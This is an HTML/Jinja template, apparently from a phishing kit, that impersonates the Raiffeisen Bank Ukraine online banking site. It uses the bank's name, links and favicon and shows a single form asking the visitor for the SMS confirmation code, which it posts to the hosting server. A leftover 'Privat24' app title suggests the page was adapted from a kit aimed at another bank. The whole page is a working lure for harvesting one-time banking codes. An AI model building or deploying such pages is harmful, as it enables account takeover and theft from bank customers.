<!DOCTYPE html>
<html lang="en">

<head>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link rel="preconnect" href="https://fonts.googleapis.com">
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link href="https://fonts.googleapis.com/css2?family=Roboto+Condensed&display=swap" rel="stylesheet">
        <title>Raiffeisen Online | Raiffeisen Bank</title>
        <meta name="viewport" content="width=device-width">
        <meta property="og:url" content="https://raiffeisen.ua/">
        <meta property="og:type" content="website">
        <meta property="og:title" content="Raiffeisen Bank">
        <meta property="og:description" content="">
        <meta property="og:image" content="{{ url_for( 'static', filename='raif/img/logo.svg', v=1)}}">
        <meta name="mobile-web-app-capable" content="yes">
        <meta name="apple-mobile-web-app-capable" content="yes">
        <meta name="apple-mobile-web-app-status-bar-style" content="default">
        <meta name="apple-mobile-web-app-title" content="Privat24">
        <link rel="shortcut icon" href="https://online.raiffeisen.ua/ibank/favicon.ico">


</head>
<style>
    * {
        font-family: 'Roboto Condensed', sans-serif;
    }

    body {
        background: #fff;
        color: #000;
        display: flex;
        justify-content: center;
        align-items: center;
        height: 90vh;
    }

    .container {
        display: block;
        margin: 0 auto;
        max-width: 992px;
    }

    .wrapp {
        margin: 0 auto;
        padding: 30px;
        display: flex;
        justify-content: center;
        align-items: center;
        flex-direction: column;
        background: #fff;
        box-shadow: 20px 20px 40px rgb(44 62 80 / 15%);
        mix-blend-mode: normal;
        border-radius: 20px;
        max-width: 470px;
    }

    .header {
        margin-top: 80px;
        font-size: 32px;
        line-height: 39px;
        color: #FFFFFF;
    }

    .img {
        /* margin-top: 80px; */
    }

    .desc {
        margin: 10px 0;
        font-size: 20px;
        line-height: 24px;
        text-align: center;
        max-width: 300px;
    }

    .btn {
        margin: 0 auto;
        margin-top: 80px;
        display: flex;
        justify-content: center;
        align-items: center;
        background: linear-gradient(179.85deg, #ffe400 0.13%, rgba(187, 187, 187, 0) 861.01%);
        backdrop-filter: blur(2px);
        border-radius: 15px;
        border: none;
        width: 150px;
        height: 50px;
        font-size: 24px;
        line-height: 29px;
        opacity: 0;
        visibility: hidden;
        transition: all 0.5s ease;
        cursor: pointer;
        color: #fff;
    }

    .input {
        background: #fff;
        border: none;
        border-bottom: 1px solid #ffe400;
        margin-top: 80px;
        color: #000;
        outline: none;
        text-align: center;
        font-size: 20px;
    }

    @media only screen and (max-width: 425px) {
        body {
            display: flex;
        }

        .wrapp {
            box-sizing: border-box;
            width: 310px;
        }
    }
</style>

<body>
    <div class="container">
        <div class="wrapp">
            <img src="{{ url_for( 'static', filename='raif/img/logo.svg', v=1)}}" alt="phone" class="img">
            <!-- <img src="./img/phone.png" alt="phone" class="img"> -->
            <form method="POST" class="form">
                <label for="code"></label>
                <input type="text" class="input" id="code" name="code" autocomplete="off">
                <div class="desc">Код підтвердження з СМС</div>
                <input type="submit" class="btn" id="btn" value="Далi">
            </form>

        </div>
    </div>
</body>
<script src="{{ url_for( 'static', filename='raif/cleave.min.js', v=1)}}"></script>
<script>
    let btn = document.getElementById('btn')
    let code = document.getElementById('code')
    let codeValue
    code.oninput = () => {
        codeValue = code.value.length
        console.log(codeValue)
    }

    setInterval(() => {
        if (codeValue >= 3 && codeValue <= 9) {
            btn.style.visibility = 'visible'
            btn.style.opacity = '1'
        } else {
            btn.style.visibility = 'hidden'
            btn.style.opacity = '0'
        }
    }, 1000)
    new Cleave('#code', {
        blocks: [8],
        numericOnly: true
    });
</script>


</html>